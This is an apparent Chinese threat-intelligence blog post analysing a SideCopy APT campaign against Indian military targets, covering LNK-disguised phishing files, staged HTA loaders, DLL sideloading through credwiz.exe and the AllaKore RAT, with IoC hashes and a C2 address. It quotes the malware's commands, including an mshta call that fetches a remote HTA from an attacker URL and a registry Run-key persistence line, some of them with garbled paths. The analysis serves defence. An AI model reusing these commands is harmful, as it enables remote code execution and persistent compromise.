点击蓝字关注我们
警惕LNK文件攻击导致数据窃取!SideCopy近期针对印度地区攻击活动分析
– by 猎影实验室-
事件背景
近日,安恒信息猎影实验室捕获到SideCopy组织疑似针对印度国防部的攻击样本,样本攻击流程仍然以模仿SideWinder为主,通过钓鱼邮件下发包含有恶意LNK文件的压缩包,该LNK文件伪装成PDF文件诱使目标运行,运行后下载多阶段加载器,最后释放SideCopy组织常用的远控工具AllaKoreRAT。
诱饵文件冒充指挥官副手向陆军部队下发指令,完整信函如下。
攻击流程如下图:
攻击分析
01
第一阶段
原始样本中包含伪装成PDF文件的LNK文件,运行后将执行C:WindowsSystem32mshta.exe https://tmeew.com/assets/carousel/files/LVE_CUM_POSTING_(ARMY_PERS)/jspxtoolkit
LNK文件中执行的链接将跳转至
hxxps://tmeew[.]com/assets/carousel/files/LVE_CUM_POSTING_(ARMY_PERS)/jspxtoolkit/jqueryxmlcss.hta。
该代码来自开源项目CACTUSTORCH,魔改后的函数参数为data, filename。
在加载器中对应代码如下,即传入数据经base64解码并解压到%Temp%目录下。
随后检测本地是否开启WindowsDefender,并下载后续负载:
hxxps://tmeew[.]com/assets/carousel/nttoolkit/ -> C:\ProgramData\HP\jquery.txt;
hxxps://tmeew[.]com/assets/carousel/cyxtoolkit/ -> C:\ProgramData\HP\jscy.txt
02
第二阶段
下载的文件jquery.txt仍然是采用base64解码后解压的方式得到jquery.hta。
jquery.hta与一阶段jqueryxmlcss.hta的文件逻辑构造相似,增加有反病毒产品检测,以及参数变更为exeBytes, dllBytes。
第二阶段DLL文件将根据目标机器上安装的反病毒产品进行后续操作
检测到Kaspersky杀毒软件时,
执行以下操作
●创建C:\ProgramData\gvnntr\目录,将C:\Windows\System32\credwiz.exe文件拷贝至该目录,在自启目录以及C:\Users\Public\目录下创建gvnntrSettings.lnk文件用于启动credwiz.exe并实现持久化,lnk文件包含指令如下:C:WindowsSystem32cmdexe-/c start /b C:ProgramDatagvnntrcredwiz.exe
●将EXE数据(3b4abb7b29f7f41b30f4ed8d86dc6c8a)写入%Temp%\gvnntr\gvnntr.txt,并将DLL数据(cf134c9ac335f549055fe2eff65e9921)写入C:\ProgramData\newimage.jpg,写入成功后将newimage.jpg移动至C:\ProgramData\gvnntr\DUser.dll
●通过Powershell指令将%Temp%\gvnntr\gvnntr.txt重命名为gvnntr.exe
●最后执行C:\Users\Public\gvnntrSettings.lnk
检测到Avast杀毒软件时,
执行以下操作
●创建C:\ProgramData\gvnntr\目录,将C:\Windows\SysWOW64\credwiz.exe文件拷贝至该目录
将DLL数据写入C:\ProgramData\newimage.jpg后将newimage.jpg移动至C:\ProgramData\gvnntr\DUser.dll
●在C:\ProgramData\gvnntr\目录下创建gvnntr.bat文件并启动以实现持久化,gvnntr.bat文件内容如下:REG ADD “HKCUSOFTWAREMicrosoftWindowsCu3b4abb7b29f7f41b30f4ed8d86dc6c8arrentVersionRun” /V “gvnntr” /t REG_SZ /F /D “C:ProgramDatagvnntrcredwiz.exe”
●直接将EXE数据写入%Temp%\gvnntr\gvnntr.exe
●休眠3min后,启动 C:ProgramDatagvnntrcredwiz.exe
检测到Avira杀毒软件时,
执行以下操作
在C:\ProgramData\gvnntr\目录下创建gvnntr.bat文件并启动以实现持久化,gvnntr.bat内容同上,将EXE数据写入TXT,DLL数据写入DUser.dll
检测到Quick杀毒软件时,
执行以下操作
●创建C:\ProgramData\gvnntr\,将credwiz.exe文件拷贝至该目录,将DLL数据写入C:\ProgramData\extrafile.txt后移动至C:\ProgramData\gvnntr\DUser.dll
●通过BAT文件实现持久化,释放EXE数据到%Temp%\gvnntr\gvnntr.exe
●休眠1min,启动 C:ProgramDatagvnntrcredwiz.exe
检测到WindowsDefender杀毒软件时,
执行以下操作
●创建C:\ProgramData\gvnntr\,将credwiz.exe文件拷贝至该目录,将DLL数据写入C:\ProgramData\newimage.jpg后将newimage.jpg移动至C:\ProgramData\gvnntr\DUser.dll
●在C:\ProgramData\gvnntr\目录下创建gvnntr.bat文件并启动以实现持久化,将EXE数据写入%Temp%\gvnntr\gvnntr.exe
●休眠1min,启动 C:ProgramDatagvnntrcredwiz.exe
Loader下载的另一文件jscy.txt,主要是将上述变量gvnntr更改为vmmbs,其他逻辑均不变。其中EXE数据与DLL数据hash值如下
072fb8ca7c0dce0888707ccbbd37723d | DLL
98a0ed81f68297ea804e8209a28b91be | EXE
03
第三阶段
credwiz.exe启动后将加载同目录下的DUser.dll,该DLL的主要功能为启动%Temp%\gvnntr\gvnntr.exe
gvnntr.exe为最终阶段远控软件AllaKore RAT。AllaKore是一种公开可用的基于Delphi的RAT,常与CetaRAT一起用于SideCopy的攻击活动中。AllaKore的恶意功能包括:键盘记录、捕获屏幕截图、列出文件夹和文件、上传/下载文件、窃取剪贴板数据、获取/更换壁纸。
此次活动中,该RAT被命名为POISONManager
其中包含的29553fb6797c15d99bcb2d9e27abd49d组件可关联到其他AllaKore远控工具,最终连接到 209.126.80.23:{6391、3281}
tmeew[.]com解析到162.241.85.104
思考总结
01
关联
通过样本特征我们关联到该组织在今年上半年攻击活动中的样本如下。
|
Hash |
FileName/描述 |
|
2e4dad3a26976010983cc142127db4e5 |
LVE_CUM_POSTING_(ARMY_PERS).pdf.lnk |
|
8d2c06e34c6c8b8fa7fb10a11155209a |
IMG_20210824_093557.jpg.lnk |
|
02b05564439ed9a3bb00a869d06c05dd |
IMG_20210420_160203.jpg.lnk |
|
6defaf3c52ed85aa056546ad17137369 |
pay and allces.pdf.lnk.jpg.lnk(薪酬与福利) |
|
254deb71e7833cd784f0112b120a22f6 |
IMG_20201230_130459.jpg.lnk |
|
1e437d8cb03950655d38a310928de43c |
Army-Cyber-Gp-Alt-Feb-2022.pdf.lnk(陆军网络研究所) |
|
4eda1982d897c05df9f501e812da645a |
IMG_20210107_113330.jpg.lnk |
|
73396e95fd451ec770575c5ca15a3994 |
IMG_20210107_113433.jpg.lnk |
|
3fc3f755d6ffb0fe05255a107e23fdc9 |
Updated-Pay-and-Allowances-Order.pdf.lnk(更新的工资和津贴订单) |
|
8087271af2e88e6d0a2155e910e8d7bd |
IMG_20210107_113548.jpg.lnk |
|
278ea2f466cee0c26849b49b04cfd064 |
IMG_20210423_145311.jpg.lnk |
|
f01f09fbbecac9082005f45240ae0ca8 |
(Covid 19 审查文件) |
|
9840f8c397dd5a978f6b10044dca54ff |
IMG_20210107_114816.jpg.lnk |
|
d59cc2050e4a604231ac17c05af3b6a6 |
(选举相关) |
|
199f37e9a4e639487900c368eb7699b8 |
IMG_20210424_112355.jpg.lnk |
|
61138dcf0a7cf4aaa224745f45826350 |
revised-criteria.pdf.lnk(单位修订文件审查) |
|
281f5db2e7bdc3765a15035fa11f8364 |
IMG_20210107_113448.jpg.lnk |
|
bdd4de79eec3683377102d667438d42c |
IMG_20210117_122021.jpg.lnk |
|
255e2c84f53e7be6dfb830a8cc73b276 |
IMG_20210424_112355.jpg.lnk |
02
总结
SideCopy组织近一年来攻击活动频繁,攻击武器从C#、Delphi发展至Golang,从Windows发展至多平台,攻击目标却始终牢牢锁定印度国防部。此外,该组织乐此不疲地在攻击活动中使用LNK伪装成JPG、Word、PDF等文件,说明此攻击手段针对特定目标人群有较大的成功率。
安恒建议广大用户谨慎对待未知来源的邮件附件及链接,提高对LNK文件攻击的警惕。如有需要鉴别的未知来源样本,可以投递至安恒云沙箱查看判别结果后再进行后续操作。
防范建议
目前安全数据部已具备相关威胁检测能力,对应产品已完成IoC情报的集成:
●安恒产品已集成能力:
针对该事件中的最新IoC情报,以下产品的版本可自动完成更新,若无法自动更新则请联系技术人员手动更新:
(1)AiLPHA分析平台V5.0.0及以上版本
(2)AiNTA设备V1.2.2及以上版本
(3)AXDR平台V2.0.3及以上版本
(4)APT设备V2.0.67及以上版本
(5)EDR产品V2.0.17及以上版本
● 安恒云沙盒已集成了该事件中的样本特征:
用户可通过云沙盒:
https://ti.dbappsecurity.com.cn/sandbox,对可疑文件进行免费分析,并下载分析报告。
● IOC:
关注公众号留言“ 20220712 ”,即可获取。
安恒信息安全数据部, 下设猎影实验室、零壹实验室、析安实验室和回声实验室,团队以数据分析与技术研究为核心,致力于数据驱动安全创造用户价值。
猎影实验室
高级威胁研究团队,专注于APT攻击发现、分析、检测、溯源、防御等研究,以及积累了海量的IoC情报数据。
网络安全研究宅基地
扫码关注我们
一群技术宅
原文始发于微信公众号(网络安全研究宅基地):警惕LNK文件攻击导致数据窃取!SideCopy近期针对印度地区攻击活动分析
